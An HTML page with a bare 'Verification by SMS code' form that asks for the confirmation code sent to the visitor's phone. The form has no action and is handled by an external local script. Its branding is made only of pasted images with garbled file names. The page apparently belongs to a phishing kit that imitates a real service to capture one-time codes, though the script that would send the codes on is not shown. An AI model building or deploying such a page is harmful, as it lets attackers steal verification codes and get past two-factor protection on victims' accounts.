<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/main.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    <div>
        <div class="hedos">
            <div class="herop1">
                <div class="line1"></div>
                <div class="lefto">
                    <img class="img1" src="./img/lopogo1.JPG" alt="">
                    <img class="img2" src="./img/toupopcc1.JPG" alt="">
                </div>
            </div>
            <!--  -->
            <div class="herop2">
                <img src="./img/rightootoupopcc2.JPG" alt="">
            </div>
        </div>
        <!--  -->
        <div class="hetod">
            <img src="./img/hed2.jpg" alt="">
        </div>
    </div>

    <div class="section">
        <div class="lefit">
            <p class="p1">Verification by SMS code.</p>
            <div>
                <form method="post" id="pg3">
                    <p class="pp2">Enter the confirmation code received via SMS to your number</p>

                    <p>SMS code</p>
                    <input class="inp3" type="tel" name="" id="sps1" required maxlength="8"> <br>

                    
                    <button type="submit" class="btn3">Confirm</button>
                </form>
            </div>
        </div>
            <!--  -->
        
    </div>


    <div>
        <div class="botopc">
            <img src="./img/boitopc1.jpeg" alt="">
        </div>

        <div class="bototel">
            <img src="./img/bot.JPG" alt="">
        </div>
    </div>
    <!-- my script -->
    <script src="./js/stb.js"></script>
</body>
</html>